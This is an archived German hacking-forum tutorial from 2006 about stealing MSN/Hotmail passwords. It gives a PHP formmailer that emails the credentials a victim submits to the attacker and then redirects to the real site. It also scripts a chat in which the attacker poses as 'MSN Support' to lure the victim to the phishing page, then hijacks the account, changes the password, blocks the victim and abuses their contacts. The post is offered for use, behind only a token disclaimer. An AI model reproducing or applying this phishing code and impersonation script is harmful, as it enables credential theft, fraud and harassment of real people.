Hack3rz-Forum | Hacker Foren
Verfügbare Informationen zu "MSN Hacken mit SocialEngineerig und Phising"

  • Qualität des Beitrags: 0 Sterne
  • Beteiligte Poster: sks999
  • Forum: Hack3rz-Forum | Hacker Foren
  • Forenbeschreibung: Alle hier angeboten Ware ist nur zu Demonstrationszwecken! Wer den hier verbreiteten Inhalt für ander Zwecke nutzt macht sich Strafbar!
  • aus dem Unterforum: Tuts rund ums hacken
  • Antworten: 1
  • Forum gestartet am: Dienstag 02.05.2006
  • Sprache: deutsch
  • Link zum Originaltopic: MSN Hacken mit SocialEngineerig und Phising
  • Letzte Antwort: vor 11 Jahren, 5 Monaten, 3 Tagen, 12 Stunden, 31 Minuten

Alle Beiträge und Antworten zu "MSN Hacken mit SocialEngineerig und Phising"

Re: MSN Hacken mit SocialEngineerig und Phising

sks999 - 18.06.2006, 12:38
MSN Hacken mit SocialEngineerig und Phising
So im diesem Tut Zeige ich euch wie man mit einfachen Mitteln schnell ein MSN Passwort kriegt. Als erstes braucht ihr eine Phising-Seite für MSN/Hotmail. Hier könnt ihr zusehen wie ich eine Phisingseite bastle. Alle die das Zeugs Downloaden wollen klicken hier. Solltet ihr das Zeugs gedownloadet haben müsst ihr nurnoch im formmailer.php "your@email.adress" durch eure E-Mail Adresse ersetzen und dann Uploaden. Ich empfehle euch jedoch das ihr die Seite selbst bastelt.
Für die Selbstbastler hier das Template des Formmailers den ich verwendet habe.
Code:<?php
$yourmail = "
yourmail";

mail("$yourmail", "


$naam. Account Details.



$yourmail", "Username : $user \n Password: $passwd  \n \n");


header("Location: original adress");

?>

So das wars soweit mit dem erstellen der Phisingseite. Ihr müsst das nurnoch auf nen Webspace Uploaden der PHP unterstüzt. Wo ihr solchen Space bekommt sagt euch Google.

Nun zum Teil in dem ihr euer Opfer dazu bringen müsst sein PW auf dieser Seite anzugeben. Ich gebe mich dazu als Supporter von MSN aus. Erstellt euch also eine MSN adresse ide z.B. so lauten kann "msn_support_53@msn.com". Nun loggt ihr euch mit dieser Adresse ins MSN ein. Macht euren Namen z.B. so "MSN-Support Deutschland", und nehmt ein gutes Anzeigebild. Nehmt z.B. das Schachbrett oder noch besser ihr macht euch ein MSN-Support Logo. Nun fügt ihr euer Opfer der Kontakliste hinzu (ihr werdet zu 99% angenommen). Nun führt ihr ein Gespräch mit dem Opfer das etwa so aussehen kann: (wir nehmen an die adresse des Opfer wäre "hans.meier@msn.com")

Ich: Guten Tag Herr hans.meier
Opfer: Wer sind Sie?
Ich: Ich bin offizieller Supporter von MSN.
Opfer: Ach so.
Ich: Wir von MSN hätten einige Fragen an Sie. Hätte Sie 2 Minuten Zeit?
Opfer: Ja
Ich: Gut danke.
Wieviele Stunden am Tag nutzen Sie MSN?
Opfer: 1-2 Stunden am Tag
Ich: Gut. Wir haben festgestellt das viele User Probleme beim Login haben. Wir bitten Sie sich nun auf folgender Seite kurz anzumelden, soo können wir den Fehler detailierter analysieren.
http://URL_ZUR_PHISING_SEITE
Opfer: OK
*Anmerkung: Ich hab die Daten gerade eben per E-mail erhalten. Erst jetzt geht das Gespräch weiter.*
Ich: Gut. Ich sehe die Analyse ist gerade angekommen. Danke
Haben Sie noch einen Verbesserungsvorschlag?
Opfer: Ja, beheben Sie die Login Probleme! :D
Ich: Ok, ich bin dran. ;)
Schönen Tag noch Herr hans.heier
*Anmerkung: Bei dem Teil an bei dem ihr die Daten empfangen habt. loggt ihr euch während das Gespräch weiter geht auf Hotmail.com ein un ändert das Passwort. Nach dem Ende des Gesprächs blockt ihr das Opfer.*

So nun loggt ihr euch mit MSN in den Account des Opfers ein und löscht euch aus der Kontaktliste. Nun könnt ihr den Account verwüsten die Kollegen beleidigen und was auch immer. Wollt ihr das euer Opfer sich wieder einloggen kann? Dann wechselt das Passwort wieder auf sein altes.

sks999
Mit folgendem Code, können Sie den Beitrag ganz bequem auf ihrer Homepage verlinken
Weitere Beiträge aus diesem Forum
Neues Forum - gepostet von sks999 am Montag 12.06.2006
Wir sind umgezogen - gepostet von sks999 am Freitag 22.09.2006
Ähnliche Beiträge
HACKEN - Series (Donnerstag 06.10.2005)
hacken?? wie denn?? - n!s (Mittwoch 22.06.2005)
icq 5.1 hacken ...ip vorhanden!!!! - alextv01 (Montag 23.10.2006)
Hacken - probstel (Dienstag 04.09.2007)
Hacken leicht gemacht! - administrator (Montag 23.10.2006)
Hacken lernen?! - Nosferatu (Samstag 12.08.2006)
BrowserGame - Server hacken ! - onelife (Montag 24.07.2006)
hacken - DESH (Sonntag 19.12.2004)
Hacken Leicht Gemacht - fatal1ty (Donnerstag 20.04.2006)
wlan hacken :twisted: - alina (Montag 30.10.2006)